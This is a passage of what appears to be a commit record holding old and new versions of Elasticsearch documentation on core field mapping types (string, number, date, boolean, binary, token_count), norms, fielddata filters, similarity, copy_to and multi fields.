is stored,\nand it can be retrieved from it).\n\n|`index` |Set to `analyzed` for the field to be indexed and searchable\nafter being broken down into token using an analyzer. `not_analyzed`\nmeans that its still searchable, but does not go through any analysis\nprocess or broken down into tokens. `no` means that it won't be\nsearchable at all (as an individual field; it may still be included in\n`_all`). Setting to `no` disables `include_in_all`. Defaults to\n`analyzed`.\n\n|`doc_values` |Set to `true` to store field values in a column-stride fashion.\nAutomatically set to `true` when the <<fielddata-formats,`fielddata` format>> is `doc_values`.\n\n|`term_vector` |Possible values are `no`, `yes`, `with_offsets`,\n`with_positions`, `with_positions_offsets`. Defaults to `no`.\n\n|`boost` |The boost value. Defaults to `1.0`.\n\n|`null_value` |When there is a (JSON) null value for the field, use the\n`null_value` as the field value. Defaults to not adding the field at\nall.\n\n|`norms: {enabled: <value>}` |Boolean value if norms should be enabled or\nnot. Defaults to `true` for `analyzed` fields, and to `false` for\n`not_analyzed` fields. See the <<norms,section about norms>>.\n\n|`norms: {loading: <value>}` |Describes how norms should be loaded, possible values are\n`eager` and `lazy` (default). It is possible to change the default value to\neager for all fields by configuring the index setting `index.norms.loading`\nto `eager`.\n\n|`index_options` | Allows to set the indexing\noptions, possible values are `docs` (only doc numbers are indexed),\n`freqs` (doc numbers and term frequencies), and `positions` (doc\nnumbers, term frequencies and positions). Defaults to `positions` for\n`analyzed` fields, and to `docs` for `not_analyzed` fields. It\nis also possible to set it to `offsets` (doc numbers, term\nfrequencies, positions and offsets).\n\n|`analyzer` |The analyzer used to analyze the text contents when\n`analyzed` during indexing and when searching using a query string.\nDefaults to the globally configured analyzer.\n\n|`index_analyzer` |The analyzer used to analyze the text contents when\n`analyzed` during indexing.\n\n|`search_analyzer` |The analyzer used to analyze the field when part of\na query string. Can be updated on an existing field.\n\n|`include_in_all` |Should the field be included in the `_all` field (if\nenabled). If `index` is set to `no` this defaults to `false`, otherwise,\ndefaults to `true` or to the parent `object` type setting.\n\n|`ignore_above` |The analyzer will ignore strings larger than this size.\nUseful for generic `not_analyzed` fields that should ignore long text.\n\n|`position_offset_gap` |Position increment gap between field instances\nwith the same field name. Defaults to 0.\n|=======================================================================\n\nThe `string` type also support custom indexing parameters associated\nwith the indexed value. For example:\n\n[source,js]\n--------------------------------------------------\n{\n \"message\" : {\n \"_value\": \"boosted value\",\n \"_boost\": 2.0\n }\n}\n--------------------------------------------------\n\nThe mapping is required to disambiguate the meaning of the document.\nOtherwise, the structure would interpret \"message\" as a value of type\n\"object\". The key `_value` (or `value`) in the inner document specifies\nthe real string content that should eventually be indexed. The `_boost`\n(or `boost`) key specifies the per field document boost (here 2.0).\n\n[float]\n[[norms]]\n===== Norms\n\nNorms store various normalization factors that are later used (at query time)\nin order to compute the score of a document relatively to a query.\n\nAlthough useful for scoring, norms also require quite a lot of memory\n(typically in the order of one byte per document per field in your index,\neven for documents that don't have this specific field). As a consequence, if\nyou don't need scoring on a specific field, it is highly recommended to disable\nnorms on it. In particular, this is the case for fields that are used solely\nfor filtering or aggregations.\n\nadded[1.2.0]\nIn case you would like to disable norms after the fact, it is possible to do so\nby using the <<indices-put-mapping,PUT mapping API>>. Please however note that\nnorms won't be removed instantly, but as your index will receive new insertions\nor updates, and segments get merged. Any score computation on a field that got\nnorms removed might return inconsistent results since some documents won't have\nnorms anymore while other documents might still have norms.\n\n[float]\n[[number]]\n==== Number\n\nA number based type supporting `float`, `double`, `byte`, `short`,\n`integer`, and `long`. It uses specific constructs within Lucene in\norder to support numeric values. The number types have the same ranges\nas corresponding\nhttp:\/\/docs.oracle.com\/javase\/tutorial\/java\/nutsandbolts\/datatypes.html[Java\ntypes]. An example mapping can be:\n\n[source,js]\n--------------------------------------------------\n{\n \"tweet\" : {\n \"properties\" : {\n \"rank\" : {\n \"type\" : \"float\",\n \"null_value\" : 1.0\n }\n }\n }\n}\n--------------------------------------------------\n\nThe following table lists all the attributes that can be used with a\nnumbered type:\n\n[cols=\"<,<\",options=\"header\",]\n|=======================================================================\n|Attribute |Description\n|`type` |The type of the number. Can be `float`, `double`, `integer`,\n`long`, `short`, `byte`. Required.\n\n|`index_name` |The name of the field that will be stored in the index.\nDefaults to the property\/field name.\n\n|`store` |Set to `true` to store actual field in the index, `false` to not\nstore it. Defaults to `false` (note, the JSON document itself is stored,\nand it can be retrieved from it).\n\n|`index` |Set to `no` if the value should not be indexed. Setting to\n`no` disables `include_in_all`. If set to `no` the field should be either stored\nin `_source`, have `include_in_all` enabled, or `store` be set to\n`true` for this to be useful.\n\n|`doc_values` |Set to `true` to store field values in a column-stride fashion.\nAutomatically set to `true` when the fielddata format is `doc_values`.\n\n|`precision_step` |The precision step (influences the number of terms\ngenerated for each number value). Defaults to `16` for `long`, `double`,\n`8` for `short`, `integer`, `float`, and `2147483647` for `byte`.\n\n|`boost` |The boost value. Defaults to `1.0`.\n\n|`null_value` |When there is a (JSON) null value for the field, use the\n`null_value` as the field value. Defaults to not adding the field at\nall.\n\n|`include_in_all` |Should the field be included in the `_all` field (if\nenabled). If `index` is set to `no` this defaults to `false`, otherwise,\ndefaults to `true` or to the parent `object` type setting.\n\n|`ignore_malformed` |Ignored a malformed number. Defaults to `false`.\n\n|`coerce` |Try convert strings to numbers and truncate fractions for integers. Defaults to `true`.\n\n|=======================================================================\n\n[float]\n[[token_count]]\n==== Token Count\nThe `token_count` type maps to the JSON string type but indexes and stores\nthe number of tokens in the string rather than the string itself. For\nexample:\n\n[source,js]\n--------------------------------------------------\n{\n \"tweet\" : {\n \"properties\" : {\n \"name\" : {\n \"type\" : \"string\",\n \"fields\" : {\n \"word_count\": {\n \"type\" : \"token_count\",\n \"store\" : \"yes\",\n \"analyzer\" : \"standard\"\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\nAll the configuration that can be specified for a number can be specified\nfor a token_count. The only extra configuration is the required\n`analyzer` field which specifies which analyzer to use to break the string\ninto tokens. For best performance, use an analyzer with no token filters.\n\n[NOTE]\n===================================================================\nTechnically the `token_count` type sums position increments rather than\ncounting tokens. This means that even if the analyzer filters out stop\nwords they are included in the count.\n===================================================================\n\n[float]\n[[date]]\n==== Date\n\nThe date type is a special type which maps to JSON string type. It\nfollows a specific format that can be explicitly set. All dates are\n`UTC`. Internally, a date maps to a number type `long`, with the added\nparsing stage from string to long and from long to string. An example\nmapping:\n\n[source,js]\n--------------------------------------------------\n{\n \"tweet\" : {\n \"properties\" : {\n \"postDate\" : {\n \"type\" : \"date\",\n \"format\" : \"YYYY-MM-dd\"\n }\n }\n }\n}\n--------------------------------------------------\n\nThe date type will also accept a long number representing UTC\nmilliseconds since the epoch, regardless of the format it can handle.\n\nThe following table lists all the attributes that can be used with a\ndate type:\n\n[cols=\"<,<\",options=\"header\",]\n|=======================================================================\n|Attribute |Description\n|`index_name` |The name of the field that will be stored in the index.\nDefaults to the property\/field name.\n\n|`format` |The <<mapping-date-format,date\nformat>>. Defaults to `dateOptionalTime`.\n\n|`store` |Set to `true` to store actual field in the index, `false` to not\nstore it. Defaults to `false` (note, the JSON document itself is stored,\nand it can be retrieved from it).\n\n|`index` |Set to `no` if the value should not be indexed. Setting to\n`no` disables `include_in_all`. If set to `no` the field should be either stored\nin `_source`, have `include_in_all` enabled, or `store` be set to\n`true` for this to be useful.\n\n|`doc_values` |Set to `true` to store field values in a column-stride fashion.\nAutomatically set to `true` when the fielddata format is `doc_values`.\n\n|`precision_step` |The precision step (influences the number of terms\ngenerated for each number value). Defaults to `16`.\n\n|`boost` |The boost value. Defaults to `1.0`.\n\n|`null_value` |When there is a (JSON) null value for the field, use the\n`null_value` as the field value. Defaults to not adding the field at\nall.\n\n|`include_in_all` |Should the field be included in the `_all` field (if\nenabled). If `index` is set to `no` this defaults to `false`, otherwise,\ndefaults to `true` or to the parent `object` type setting.\n\n|`ignore_malformed` |Ignored a malformed number. Defaults to `false`.\n\n|=======================================================================\n\n[float]\n[[boolean]]\n==== Boolean\n\nThe boolean type Maps to the JSON boolean type. It ends up storing\nwithin the index either `T` or `F`, with automatic translation to `true`\nand `false` respectively.\n\n[source,js]\n--------------------------------------------------\n{\n \"tweet\" : {\n \"properties\" : {\n \"hes_my_special_tweet\" : {\n \"type\" : \"boolean\"\n }\n }\n }\n}\n--------------------------------------------------\n\nThe boolean type also supports passing the value as a number or a string\n(in this case `0`, an empty string, `false`, `off` and `no` are\n`false`, all other values are `true`).\n\nThe following table lists all the attributes that can be used with the\nboolean type:\n\n[cols=\"<,<\",options=\"header\",]\n|=======================================================================\n|Attribute |Description\n|`index_name` |The name of the field that will be stored in the index.\nDefaults to the property\/field name.\n\n|`store` |Set to `true` to store actual field in the index, `false` to not\nstore it. Defaults to `false` (note, the JSON document itself is stored,\nand it can be retrieved from it).\n\n|`index` |Set to `no` if the value should not be indexed. Setting to\n`no` disables `include_in_all`. If set to `no` the field should be either stored\nin `_source`, have `include_in_all` enabled, or `store` be set to\n`true` for this to be useful.\n\n|`boost` |The boost value. Defaults to `1.0`.\n\n|`null_value` |When there is a (JSON) null value for the field, use the\n`null_value` as the field value. Defaults to not adding the field at\nall.\n|=======================================================================\n\n[float]\n[[binary]]\n==== Binary\n\nThe binary type is a base64 representation of binary data that can be\nstored in the index. The field is not stored by default and not indexed at\nall.\n\n[source,js]\n--------------------------------------------------\n{\n \"tweet\" : {\n \"properties\" : {\n \"image\" : {\n \"type\" : \"binary\"\n }\n }\n }\n}\n--------------------------------------------------\n\nThe following table lists all the attributes that can be used with the\nbinary type:\n\n[horizontal]\n\n`index_name`::\n\n The name of the field that will be stored in the index. Defaults to the\n property\/field name.\n\n`store`::\n\n Set to `true` to store actual field in the index, `false` to not store it.\n Defaults to `false` (note, the JSON document itself is already stored, so\n the binary field can be retrieved from there).\n\n`doc_values`::\n\n Set to `true` to store field values in a column-stride fashion.\n\n`compress`::\n\n Set to `true` to compress the stored binary value.\n\n`compress_threshold`::\n\n Compression will only be applied to stored binary fields that are greater\n than this size. Defaults to `-1`\n\nNOTE: Enabling compression on stored binary fields only makes sense on large\nand highly-compressible values. Otherwise per-field compression is usually not\nworth doing as the space savings do not compensate for the overhead of the\ncompression format. Normally, you should not configure any compression and\njust rely on the block compression of stored fields (which is enabled by\ndefault and can't be disabled).\n\n[float]\n[[fielddata-filters]]\n==== Fielddata filters\n\nIt is possible to control which field values are loaded into memory,\nwhich is particularly useful for faceting on string fields, using\nfielddata filters, which are explained in detail in the\n<<index-modules-fielddata,Fielddata>> section.\n\nFielddata filters can exclude terms which do not match a regex, or which\ndon't fall between a `min` and `max` frequency range:\n\n[source,js]\n--------------------------------------------------\n{\n tweet: {\n type: \"string\",\n analyzer: \"whitespace\"\n fielddata: {\n filter: {\n regex: {\n \"pattern\": \"^#.*\"\n },\n frequency: {\n min: 0.001,\n max: 0.1,\n min_segment_size: 500\n }\n }\n }\n }\n}\n--------------------------------------------------\n\nThese filters can be updated on an existing field mapping and will take\neffect the next time the fielddata for a segment is loaded. Use the\n<<indices-clearcache,Clear Cache>> API\nto reload the fielddata using the new filters.\n\n[float]\n==== Similarity\n\nElasticsearch allows you to configure a similarity (scoring algorithm) per field.\nThe `similarity` setting provides a simple way of choosing a similarity algorithm\nother than the default TF\/IDF, such as `BM25`.\n\nYou can configure similarities via the\n<<index-modules-similarity,similarity module>>\n\n[float]\n===== Configuring Similarity per Field\n\nDefining the Similarity for a field is done via the `similarity` mapping\nproperty, as this example shows:\n\n[source,js]\n--------------------------------------------------\n{\n \"book\":{\n \"properties\":{\n \"title\":{\n \"type\":\"string\", \"similarity\":\"BM25\"\n }\n }\n }\n}\n--------------------------------------------------\n\nThe following Similarities are configured out-of-box:\n\n`default`::\n The Default TF\/IDF algorithm used by Elasticsearch and\n Lucene in previous versions.\n\n`BM25`::\n The BM25 algorithm.\n http:\/\/en.wikipedia.org\/wiki\/Okapi_BM25[See Okapi_BM25] for more\n details.\n\n\n[[copy-to]]\n[float]\n===== Copy to field\n\nadded[1.0.0.RC2]\n\nAdding `copy_to` parameter to any field mapping will cause all values of this field to be copied to fields specified in\nthe parameter. In the following example all values from fields `title` and `abstract` will be copied to the field\n`meta_data`.\n\n\n[source,js]\n--------------------------------------------------\n{\n \"book\" : {\n \"properties\" : {\n \"title\" : { \"type\" : \"string\", \"copy_to\" : \"meta_data\" },\n \"abstract\" : { \"type\" : \"string\", \"copy_to\" : \"meta_data\" },\n \"meta_data\" : { \"type\" : \"string\" }\n }\n}\n--------------------------------------------------\n\nMultiple fields are also supported:\n\n[source,js]\n--------------------------------------------------\n{\n \"book\" : {\n \"properties\" : {\n \"title\" : { \"type\" : \"string\", \"copy_to\" : [\"meta_data\", \"article_info\"] }\n }\n}\n--------------------------------------------------\n\n[float]\n===== Multi fields\n\nadded[1.0.0.RC1]\n\nThe `fields` options allows to map several core types fields into a single\njson source field. This can be useful if a single field need to be\nused in different ways. For example a single field is to be used for both\nfree text search and sorting.\n\n[source,js]\n--------------------------------------------------\n{\n \"tweet\" : {\n \"properties\" : {\n \"name\" : {\n \"type\" : \"string\",\n \"index\" : \"analyzed\",\n \"fields\" : {\n \"raw\" : {\"type\" : \"string\", \"index\" : \"not_analyzed\"}\n }\n }\n }\n }\n}\n--------------------------------------------------\n\nIn the above example the field `name` gets processed twice. The first time it gets\nprocessed as an analyzed string and this version is accessible under the field name\n`name`, this is the main field and is in fact just like any other field. The second time\nit gets processed as a not analyzed string and is accessible under the name `name.raw`.\n\n[float]\n==== Include in All\n\nThe `include_in_all` setting is ignored on any field that is defined in\nthe `fields` options. Setting the `include_in_all` only makes sense on\nthe main field, since the raw field value is copied to the `_all` field,\nthe tokens aren't copied.\n\n[float]\n==== Updating a field\n\nIn the essence a field can't be updated. However multi fields can be\nadded to existing fields. This allows for example to have a different\n`index_analyzer` configuration in addition to the already configured\n`index_analyzer` configuration specified in the main and other multi fields.\n\nAlso the new multi field will only be applied on document that have been\nadded after the multi field has been added and in fact the new multi field\ndoesn't exist in existing documents.\n\nAnother important note is that new multi fields will be merged into the\nlist of existing multi fields, so when adding new multi fields for a field\nprevious added multi fields don't need to be specified.\n\n","old_contents":"[[mapping-core-types]]\n=== Core Types\n\nEach JSON field can be mapped to a specific core type. JSON itself\nalready provides us with some typing, with its support for `string`,\n`integer`\/`long`, `float`\/`double`, `boolean`, and `null`.\n\nThe following sample tweet JSON document will be used to explain the\ncore types:\n\n[source,js]\n--------------------------------------------------\n{\n \"tweet\" {\n \"user\" : \"kimchy\"\n \"message\" : \"This is a tweet!\",\n \"postDate\" : \"2009-11-15T14:12:12\",\n \"priority\" : 4,\n \"rank\" : 12.3\n }\n}\n--------------------------------------------------\n\nExplicit mapping for the above JSON tweet can be:\n\n[source,js]\n--------------------------------------------------\n{\n \"tweet\" : {\n \"properties\" : {\n \"user\" : {\"type\" : \"string\", \"index\" : \"not_analyzed\"},\n \"message\" : {\"type\" : \"string\", \"null_value\" : \"na\"},\n \"postDate\" : {\"type\" : \"date\"},\n \"priority\" : {\"type\" : \"integer\"},\n \"rank\" : {\"type\" : \"float\"}\n }\n }\n}\n--------------------------------------------------\n\n[float]\n[[string]]\n==== String\n\nThe text based string type is the most basic type, and contains one or\nmore characters. An example mapping can be:\n\n[source,js]\n--------------------------------------------------\n{\n \"tweet\" : {\n \"properties\" : {\n \"message\" : {\n \"type\" : \"string\",\n \"store\" : true,\n \"index\" : \"analyzed\",\n \"null_value\" : \"na\"\n },\n \"user\" : {\n \"type\" : \"string\",\n \"index\" : \"not_analyzed\",\n \"norms\" : {\n \"enabled\" : false\n }\n }\n }\n }\n}\n--------------------------------------------------\n\nThe above mapping defines a `string` `message` property\/field within the\n`tweet` type. The field is stored in the index (so it can later be\nretrieved using selective loading when searching), and it gets analyzed\n(broken down into searchable terms). If the message has a `null` value,\nthen the value that will be stored is `na`. There is also a `string` `user`\nwhich is indexed as-is (not broken down into tokens) and has norms\ndisabled (so that matching this field is a binary decision, no match is\nbetter than another one).\n\nThe following table lists all the attributes that can be used with the\n`string` type:\n\n[cols=\"<,<\",options=\"header\",]\n|=======================================================================\n|Attribute |Description\n|`index_name` |The name of the field that will be stored in the index.\nDefaults to the property\/field name.\n\n|`store` |Set to `true` to actually store the field in the index, `false` to not\nstore it. Defaults to `false` (note, the JSON document itself is stored,\nand it can be retrieved from it).\n\n|`index` |Set to `analyzed` for the field to be indexed and searchable\nafter being broken down into token using an analyzer. `not_analyzed`\nmeans that its still searchable, but does not go through any analysis\nprocess or broken down into tokens. `no` means that it won't be\nsearchable at all (as an individual field; it may still be included in\n`_all`). Setting to `no` disables `include_in_all`. Defaults to\n`analyzed`.\n\n|`doc_values` |Set to `true` to store field values in a column-stride fashion.\nAutomatically set to `true` when the <<fielddata-formats,`fielddata` format>> is `doc_values`.\n\n|`term_vector` |Possible values are `no`, `yes`, `with_offsets`,\n`with_positions`, `with_positions_offsets`. Defaults to `no`.\n\n|`boost` |The boost value. Defaults to `1.0`.\n\n|`null_value` |When there is a (JSON) null value for the field, use the\n`null_value` as the field value. Defaults to not adding the field at\nall.\n\n|`norms: {enabled: <value>}` |Boolean value if norms should be enabled or\nnot. Defaults to `true` for `analyzed` fields, and to `false` for\n`not_analyzed` fields. See the <<norms,section about norms>>.\n\n|`norms: {loading: <value>}` |Describes how norms should be loaded, possible values are\n`eager` and `lazy` (default). It is possible to change the default value to\neager for all fields by configuring the index setting `index.norms.loading`\nto `eager`.\n\n|`index_options` | Allows to set the indexing\noptions, possible values are `docs` (only doc numbers are indexed),\n`freqs` (doc numbers and term frequencies), and `positions` (doc\nnumbers, term frequencies and positions). Defaults to `positions` for\n`analyzed` fields, and to `docs` for `not_analyzed` fields. It\nis also possible to set it to `offsets` (doc numbers, term\nfrequencies, positions and offsets).\n\n|`analyzer` |The analyzer used to analyze the text contents when\n`analyzed` during indexing and when searching using a query string.\nDefaults to the globally configured analyzer.\n\n|`index_analyzer` |The analyzer used to analyze the text contents when\n`analyzed` during indexing.\n\n|`search_analyzer` |The analyzer used to analyze the field when part of\na query string. Can be updated on an existing field.\n\n|`include_in_all` |Should the field be included in the `_all` field (if\nenabled). If `index` is set to `no` this defaults to `false`, otherwise,\ndefaults to `true` or to the parent `object` type setting.\n\n|`ignore_above` |The analyzer will ignore strings larger than this size.\nUseful for generic `not_analyzed` fields that should ignore long text.\n\n|`position_offset_gap` |Position increment gap between field instances\nwith the same field name. Defaults to 0.\n|=======================================================================\n\nThe `string` type also support custom indexing parameters associated\nwith the indexed value. For example:\n\n[source,js]\n--------------------------------------------------\n{\n \"message\" : {\n \"_value\": \"boosted value\",\n \"_boost\": 2.0\n }\n}\n--------------------------------------------------\n\nThe mapping is required to disambiguate the meaning of the document.\nOtherwise, the structure would interpret \"message\" as a value of type\n\"object\". The key `_value` (or `value`) in the inner document specifies\nthe real string content that should eventually be indexed. The `_boost`\n(or `boost`) key specifies the per field document boost (here 2.0).\n\n[float]\n[[norms]]\n===== Norms\n\nNorms store various normalization factors that are later used (at query time)\nin order to compute the score of a document relatively to a query.\n\nAlthough useful for scoring, norms also require quite a lot of memory\n(typically in the order of one byte per document per field in your index,\neven for documents that don't have this specific field). As a consequence, if\nyou don't need scoring on a specific field, it is highly recommended to disable\nnorms on it. In particular, this is the case for fields that are used solely\nfor filtering or aggregations.\n\nadded[1.2.0]\nIn case you would like to disable norms after the fact, it is possible to do so\nby using the <<indices-put-mapping,PUT mapping API>>. Please however note that\nnorms won't be removed instantly, but as your index will receive new insertions\nor updates, and segments get merged. Any score computation on a field that got\nnorms removed might return inconsistent results since some documents won't have\nnorms anymore while other documents might still have norms.\n\n[float]\n[[number]]\n==== Number\n\nA number based type supporting `float`, `double`, `byte`, `short`,\n`integer`, and `long`. It uses specific constructs within Lucene in\norder to support numeric values. The number types have the same ranges\nas corresponding\nhttp:\/\/docs.oracle.com\/javase\/tutorial\/java\/nutsandbolts\/datatypes.html[Java\ntypes]. An example mapping can be:\n\n[source,js]\n--------------------------------------------------\n{\n \"tweet\" : {\n \"properties\" : {\n \"rank\" : {\n \"type\" : \"float\",\n \"null_value\" : 1.0\n }\n }\n }\n}\n--------------------------------------------------\n\nThe following table lists all the attributes that can be used with a\nnumbered type:\n\n[cols=\"<,<\",options=\"header\",]\n|=======================================================================\n|Attribute |Description\n|`type` |The type of the number. Can be `float`, `double`, `integer`,\n`long`, `short`, `byte`. Required.\n\n|`index_name` |The name of the field that will be stored in the index.\nDefaults to the property\/field name.\n\n|`store` |Set to `true` to store actual field in the index, `false` to not\nstore it. Defaults to `false` (note, the JSON document itself is stored,\nand it can be retrieved from it).\n\n|`index` |Set to `no` if the value should not be indexed. Setting to\n`no` disables `include_in_all`. If set to `no` the field should be either stored\nin `_source`, have `include_in_all` enabled, or `store` be set to\n`true` for this to be useful.\n\n|`doc_values` |Set to `true` to store field values in a column-stride fashion.\nAutomatically set to `true` when the fielddata format is `doc_values`.\n\n|`precision_step` |The precision step (influences the number of terms\ngenerated for each number value). Defaults to `16` for `long`, `double`,\n`8` for `short`, `integer`, `float`, and `2147483647` for `byte`.\n\n|`boost` |The boost value. Defaults to `1.0`.\n\n|`null_value` |When there is a (JSON) null value for the field, use the\n`null_value` as the field value. Defaults to not adding the field at\nall.\n\n|`include_in_all` |Should the field be included in the `_all` field (if\nenabled). If `index` is set to `no` this defaults to `false`, otherwise,\ndefaults to `true` or to the parent `object` type setting.\n\n|`ignore_malformed` |Ignored a malformed number. Defaults to `false`.\n\n|`coerce` |Try convert strings to numbers and truncate fractions for integers. Defaults to `true`.\n\n|=======================================================================\n\n[float]\n[[token_count]]\n==== Token Count\nThe `token_count` type maps to the JSON string type but indexes and stores\nthe number of tokens in the string rather than the string itself. For\nexample:\n\n[source,js]\n--------------------------------------------------\n{\n \"tweet\" : {\n \"properties\" : {\n \"name\" : {\n \"type\" : \"string\",\n \"fields\" : {\n \"word_count\": {\n \"type\" : \"token_count\",\n \"store\" : \"yes\",\n \"analyzer\" : \"standard\"\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\nAll the configuration that can be specified for a number can be specified\nfor a token_count. The only extra configuration is the required\n`analyzer` field which specifies which analyzer to use to break the string\ninto tokens. For best performance, use an analyzer with no token filters.\n\n[NOTE]\n===================================================================\nTechnically the `token_count` type sums position increments rather than\ncounting tokens. This means that even if the analyzer filters out stop\nwords they are included in the count.\n===================================================================\n\n[float]\n[[date]]\n==== Date\n\nThe date type is a special type which maps to JSON string type. It\nfollows a specific format that can be explicitly set. All dates are\n`UTC`. Internally, a date maps to a number type `long`, with the added\nparsing stage from string to long and from long to string. An example\nmapping:\n\n[source,js]\n--------------------------------------------------\n{\n \"tweet\" : {\n \"properties\" : {\n \"postDate\" : {\n \"type\" : \"date\",\n \"format\" : \"YYYY-MM-dd\"\n }\n }\n }\n}\n--------------------------------------------------\n\nThe date type will also accept a long number representing UTC\nmilliseconds since the epoch, regardless of the format it can handle.\n\nThe following table lists all the attributes that can be used with a\ndate type:\n\n[cols=\"<,<\",options=\"header\",]\n|=======================================================================\n|Attribute |Description\n|`index_name` |The name of the field that will be stored in the index.\nDefaults to the property\/field name.\n\n|`format` |The <<mapping-date-format,date\nformat>>. Defaults to `dateOptionalTime`.\n\n|`store` |Set to `true` to store actual field in the index, `false` to not\nstore it. Defaults to `false` (note, the JSON document itself is stored,\nand it can be retrieved from it).\n\n|`index` |Set to `no` if the value should not be indexed. Setting to\n`no` disables `include_in_all`. If set to `no` the field should be either stored\nin `_source`, have `include_in_all` enabled, or `store` be set to\n`true` for this to be useful.\n\n|`doc_values` |Set to `true` to store field values in a column-stride fashion.\nAutomatically set to `true` when the fielddata format is `doc_values`.\n\n|`precision_step` |The precision step (influences the number of terms\ngenerated for each number value). Defaults to `16`.\n\n|`boost` |The boost value. Defaults to `1.0`.\n\n|`null_value` |When there is a (JSON) null value for the field, use the\n`null_value` as the field value. Defaults to not adding the field at\nall.\n\n|`include_in_all` |Should the field be included in the `_all` field (if\nenabled). If `index` is set to `no` this defaults to `false`, otherwise,\ndefaults to `true` or to the parent `object` type setting.\n\n|`ignore_malformed` |Ignored a malformed number. Defaults to `false`.\n\n|=======================================================================\n\n[float]\n[[boolean]]\n==== Boolean\n\nThe boolean type Maps to the JSON boolean type. It ends up storing\nwithin the index either `T` or `F`, with automatic translation to `true`\nand `false` respectively.\n\n[source,js]\n--------------------------------------------------\n{\n \"tweet\" : {\n \"properties\" : {\n \"hes_my_special_tweet\" : {\n \"type\" : \"boolean\"\n }\n }\n }\n}\n--------------------------------------------------\n\nThe boolean type also supports passing the value as a number or a string\n(in this case `0`, an empty string, `false`, `off` and `no` are\n`false`, all other values are `true`).\n\nThe following table lists all the attributes that can be used with the\nboolean type:\n\n[cols=\"<,<\",options=\"header\",]\n|=======================================================================\n|Attribute |Description\n|`index_name` |The name of the field that will be stored in the index.\nDefaults to the property\/field name.\n\n|`store` |Set to `true` to store actual field in the index, `false` to not\nstore it. Defaults to `false` (note, the JSON document itself is stored,\nand it can be retrieved from it).\n\n|`index` |Set to `no` if the value should not be indexed. Setting to\n`no` disables `include_in_all`. If set to `no` the field should be either stored\nin `_source`, have `include_in_all` enabled, or `store` be set to\n`true` for this to be useful.\n\n|`boost` |The boost value. Defaults to `1.0`.\n\n|`null_value` |When there is a (JSON) null value for the field, use the\n`null_value` as the field value. Defaults to not adding the field at\nall.\n|=======================================================================\n\n[float]\n[[binary]]\n==== Binary\n\nThe binary type is a base64 representation of binary data that can be\nstored in the index. The field is not stored by default and not indexed at\nall.\n\n[source,js]\n--------------------------------------------------\n{\n \"tweet\" : {\n \"properties\" : {\n \"image\" : {\n \"type\" : \"binary\"\n }\n }\n }\n}\n--------------------------------------------------\n\nThe following table lists all the attributes that can be used with the\nbinary type:\n\n[horizontal]\n\n`index_name`::\n\n The name of the field that will be stored in the index. Defaults to the\n property\/field name.\n\n`store`::\n\n Set to `true` to store actual field in the index, `false` to not store it.\n Defaults to `false` (note, the JSON document itself is already stored, so\n the binary field can be retrieved from there).\n\n`doc_values`::\n\n Set to `true` to store field values in a column-stride fashion.\n\n`compress`::\n\n Set to `true` to compress the stored binary value.\n\n`compress_threshold`::\n\n Compression will only be applied to stored binary fields that are greater\n than this size. Defaults to `-1`\n\nNOTE: Enabling compression on stored binary fields only makes sense on large\nand highly-compressible values. Otherwise per-field compression is usually not\nworth doing as the space savings do not compensate for the overhead of the\ncompression format. Normally, you should not configure any compression and\njust rely on the block compression of stored fields (which is enabled by\ndefault and can't be disabled).\n\n[float]\n[[fielddata-filters]]\n==== Fielddata filters\n\nIt is possible to control which field values are loaded into memory,\nwhich is particularly useful for faceting on string fields, using\nfielddata filters, which are explained in detail in the\n<<index-modules-fielddata,Fielddata>> section.\n\nFielddata filters can exclude terms which do not match a regex, or which\ndon't fall between a `min` and `max` frequency range:\n\n[source,js]\n--------------------------------------------------\n{\n tweet: {\n type: \"string\",\n analyzer: \"whitespace\"\n fielddata: {\n filter: {\n regex: {\n \"pattern\": \"^#.*\"\n },\n frequency: {\n min: 0.001,\n max: 0.1,\n min_segment_size: 500\n }\n }\n }\n }\n}\n--------------------------------------------------\n\nThese filters can be updated on an existing field mapping and will take\neffect the next time the fielddata for a segment is loaded. Use the\n<<indices-clearcache,Clear Cache>> API\nto reload the fielddata using the new filters.\n\n[float]\n==== Similarity\n\nElasticsearch allows you to configure a similarity (scoring algorithm) per field.\nThe `similarity` setting provides a simple way of choosing a similarity algorithm\nother than the default TF\/IDF, such as `BM25`.\n\nYou can configure similarities via the\n<<index-modules-similarity,similarity module>>\n\n[float]\n===== Configuring Similarity per Field\n\nDefining the Similarity for a field is done via the `similarity` mapping\nproperty, as this example shows:\n\n[source,js]\n--------------------------------------------------\n{\n \"book\":{\n \"properties\":{\n \"title\":{\n \"type\":\"string\", \"similarity\":\"BM25\"\n }\n }\n }\n}\n--------------------------------------------------\n\nThe following Similarities are configured out-of-box:\n\n`default`::\n The Default TF\/IDF algorithm used by Elasticsearch and\n Lucene in previous versions.\n\n`BM25`::\n The BM25 algorithm.\n http:\/\/en.wikipedia.org\/wiki\/Okapi_BM25[See Okapi_BM25] for more\n details.\n\n\n[[copy-to]]\n[float]\n===== Copy to field\n\nadded[1.0.0.RC2]\n\nAdding `copy_to` parameter to any field mapping will cause all values of this field to be copied to fields specified in\nthe parameter. In the following example all values from fields `title` and `abstract` will be copied to the field\n`meta_data`.\n\n\n[source,js]\n--------------------------------------------------\n{\n \"book\" : {\n \"properties\" : {\n \"title\" : { \"type\" : \"string\", \"copy_to\" : \"meta_data\" },\n \"abstract\" : { \"type\" : \"string\", \"copy_to\" : \"meta_data\" },\n \"meta_data\" : { \"type\" : \"string\" }\n }\n}\n--------------------------------------------------\n\nMultiple fields are also supported:\n\n[source,js]\n--------------------------------------------------\n{\n \"book\" : {\n \"properties\" : {\n \"title\" : { \"type\" : \"string\", \"copy_to\" : [\"meta_data\", \"article_info\"] }\n }\n}\n--------------------------------------------------\n\n[float]\n===== Multi fields\n\nadded[1.0.0.RC1]\n\nThe `fields` options allows to map several core types fields into a single\njson source field. This can be useful if a single field need to be\nused in different ways. For example a single field is to be used for both\nfree text search and sorting.\n\n[source,js]\n--------------------------------------------------\n{\n \"tweet\" : {\n \"properties\" : {\n \"name\" : {\n \"type\" : \"string\",\n \"index\" : \"analyzed\",\n \"fields\" : {\n \"raw\" : {\"type\" : \"string\", \"index\" : \"not_analyzed\"}\n }\n }\n }\n }\n}\n--------------------------------------------------\n\nIn the above example the field `name` gets processed twice. The first time it gets\nprocessed as an analyzed string and this version is accessible under the field name\n`name`, this is the main field and is in fact just like any other field. The second time\nit gets processed as a not analyzed string and is accessible under the name `name.raw`.\n\n[float]\n==== Include in All\n\nThe `include_in_all` setting is ignored on any field that is defined in\nthe `fields` options. Setting the `include_in_all` only makes sense on\nthe main field, since the raw 